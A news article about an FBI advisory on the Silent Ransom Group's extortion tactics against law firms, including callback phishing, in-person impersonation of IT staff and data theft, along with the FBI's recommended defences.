FBI Warns Law Firms of ‘Physical’ Social Engineering as Silent Ransom Group Tactics Evolve
Table of Contents
The Trojan Horse in the Lobby
Cybersecurity is often framed as a battle of firewalls and encryption, but the FBI is warning U.S. law firms that the most dangerous vulnerability might actually be their front door. In a recent advisory, federal investigators detailed the evolving tactics of the Silent Ransom Group (SRG), an extortion crew that has shifted from purely digital incursions to physical social engineering.
The group, which has been active since 2022, is increasingly employing a high-risk strategy: physically walking into law offices and posing as internal IT support. When remote phishing attempts fail to yield access, SRG operatives are reportedly entering office buildings, leveraging the inherent trust employees place in technical staff to gain direct access to hardware.
According to the FBI, these attackers often target employees who have already been contacted via phishing emails or SMS. By the time the operative arrives in person, the victim is already primed to expect a “fix” for a technical issue. The attackers then claim they need to “image the device” or “create a backup file” to assess the damage of a previous phishing attempt—a classic bait-and-switch that allows them to plug a thumb drive directly into a workstation and exfiltrate sensitive client data.
Moving Beyond the Encryption Trap
Unlike traditional ransomware gangs that lock systems behind a wall of encryption, SRG operates as a “hack-and-leak” entity. They don’t care about crashing the network; they care about the data. By stealing highly sensitive legal documents and threatening to release them on a dedicated data leak site (DLS), they create immense leverage for extortion.
The FBI notes that the legal sector has become a primary target since 2023. The motive is clear: law firms hold an incredible density of high-value intellectual property, trade secrets, and privileged communication. The risk of public exposure for a law firm’s clients is far more damaging than a few days of downtime, making these firms lucrative targets for pure data extortion.
One high-profile example of this pressure is the law firm Jones Day, which was recently listed on SRG’s leak site. While the firm confirmed a “cyber phishing incident” in April, they stopped short of naming SRG as the perpetrator. This pattern of targeting elite firms—including those representing top political figures—suggests that SRG is specifically hunting for data with maximum political or financial volatility.
The ‘Callback’ Pipeline
While physical intrusions make the headlines, the bulk of SRG’s operation remains rooted in sophisticated callback phishing. The process typically begins with a fraudulent SMS or email claiming a small, unauthorized subscription has been charged to the target’s account. To “cancel” the subscription, the victim is prompted to call a provided number.
Once on the line, the SRG operative maintains the facade of a helpful IT representative, eventually convincing the employee to grant remote desktop access. Once inside, the group uses tools like WinSCP or modified versions of Rclone to siphon data. In some cases, they even use the firm’s own internal collaboration tools, such as Microsoft OneDrive or Google Drive, to move stolen documents out of the network undetected.
Hardening the Perimeter
The FBI’s latest guidance suggests that traditional software updates are not enough to stop a physical intruder. The agency is urging firms to implement strict hardware controls, specifically disabling the use of external USB drives on company-issued devices that house confidential information.
Beyond the hardware, the FBI recommends blocking port 22 to prevent unauthorized encrypted remote access and deploying phishing-resistant multi-factor authentication (MFA) across all services. Perhaps most importantly, the advisory emphasizes the need for “human firewalls”—training staff to verify the identity of any individual claiming to be IT support, regardless of whether they are on a phone call or standing in the office.
Federal investigators are currently seeking assistance from the public and private sector, requesting phone transcripts, cryptocurrency wallet addresses, and any identifying information regarding individuals seen in office buildings during these suspected incursions.
